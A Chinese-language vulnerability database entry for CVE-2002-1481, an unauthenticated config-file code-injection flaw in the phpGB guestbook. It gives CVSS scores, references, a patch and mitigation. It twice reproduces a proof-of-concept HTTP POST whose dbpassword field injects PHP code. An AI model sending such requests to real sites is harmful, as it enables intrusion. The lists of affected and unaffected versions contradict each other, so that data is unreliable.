CVE-2002-1481
CVSS7.5
发布时间 :2003-04-22 00:00:00
修订时间 :2008-09-05 16:30:42
NMCOES    

[原文]savesettings.php in phpGB 1.20 and earlier does not require authentication, which allows remote attackers to cause a denial of service or execute arbitrary PHP code by using savesettings.php to modify config.php.


[CNNVD]phpGB远程拒绝服务攻击漏洞(CNNVD-200304-126)

        
        phpGB是一款基于PHP/MYSQL的留言本系统,可使用在Linux和其他多种Unix操作系统下。
        phpGB中savesettings.php脚本访问验证缺少正确检查,远程攻击者可以利用这个漏洞绕过验证进行拒绝服务攻击。
        phpGB中的savesettings.php对通过POST提交的页面请求只进行了验证操作,而这个验证机制相当简单,攻击者可以伪造验证写任意数据到/include/config.php脚本,由于config.php脚本在每个页面都被调用,所以一个语法错误可导致整个留言本产生拒绝服务攻击。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:phpgb:phpgb:1.20
cpe:/a:phpgb:phpgb:1.10

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1481
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1481
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200304-126
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/5679
(VENDOR_ADVISORY)  BID  5679
http://www.iss.net/security_center/static/10065.php
(VENDOR_ADVISORY)  XF  phpgb-savesettings-unauth-access(10065)
http://archives.neohapsis.com/archives/bugtraq/2002-09/0076.html
(VENDOR_ADVISORY)  BUGTRAQ  20020909 phpGB: DoS and executing_arbitrary_commands

- 漏洞信息

phpGB远程拒绝服务攻击漏洞
高危 输入验证
2003-04-22 00:00:00 2005-10-20 00:00:00
远程  
        
        phpGB是一款基于PHP/MYSQL的留言本系统,可使用在Linux和其他多种Unix操作系统下。
        phpGB中savesettings.php脚本访问验证缺少正确检查,远程攻击者可以利用这个漏洞绕过验证进行拒绝服务攻击。
        phpGB中的savesettings.php对通过POST提交的页面请求只进行了验证操作,而这个验证机制相当简单,攻击者可以伪造验证写任意数据到/include/config.php脚本,由于config.php脚本在每个页面都被调用,所以一个语法错误可导致整个留言本产生拒绝服务攻击。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 使用.htaccess限制对管理员页面的访问。
        厂商补丁:
        phpGB
        -----
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        
        http://www.walzl.net/

- 漏洞信息 (21783)

phpGB 1.1/1.2 PHP Code Injection Vulnerability (EDBID:21783)
php webapps
2002-09-09 Verified
0 ppp-design
N/A [点击下载]
source: http://www.securityfocus.com/bid/5679/info

phpGB is subject to a PHP code injection vulnerability.

After bypassing authentication it is possible to inject code into the guestbook configuration file (config.php) by supplying malicious parameters for the savesettings.php script. The configuration file is referenced in most of the other guestbook scripts, so each time one of the scripts is accessed the attacker-supplied PHP code will be executed.

telnet example.com 80\n
POST /phpGB/admin/savesettings.php HTTP/1.0\n
Content-Type: application/x-www-form-urlencoded\n
Content-Length: 123\n
dbpassword=%22%3Bphpinfo%28%29%3B%24a%3D%22&toolbar=1
&messenger=1&smileys=1&title=1&db_session_handler=0
&all_in_one=0&test=\n
\n 		

- 漏洞信息

10465
phpGB savesettings.php Authentication Bypass
Remote / Network Access

- 漏洞描述

Unknown or Incomplete

- 时间线

2002-09-09 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

phpGB PHP Code Injection Vulnerability
Input Validation Error 5679
Yes No
2002-09-09 12:00:00 2009-07-11 05:06:00
Discovery credited to ppp-design.

- 受影响的程序版本

phpGB phpGB 1.2
phpGB phpGB 1.1
phpGB phpGB 1.4
phpGB phpGB 1.3

- 不受影响的程序版本

phpGB phpGB 1.4
phpGB phpGB 1.3

- 漏洞讨论

phpGB is subject to a PHP code injection vulnerability.

After bypassing authentication it is possible to inject code into the guestbook configuration file (config.php) by supplying malicious parameters for the savesettings.php script. The configuration file is referenced in most of the other guestbook scripts, so each time one of the scripts is accessed the attacker-supplied PHP code will be executed.

- 漏洞利用

The following proof of concept was supplied by ppp-design:

telnet example.com 80\n
POST /phpGB/admin/savesettings.php HTTP/1.0\n
Content-Type: application/x-www-form-urlencoded\n
Content-Length: 123\n
dbpassword=%22%3Bphpinfo%28%29%3B%24a%3D%22&toolbar=1
&messenger=1&smileys=1&title=1&db_session_handler=0
&all_in_one=0&test=\n
\n

- 解决方案

Upgrade to phpGB 1.3.0 or greater.

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站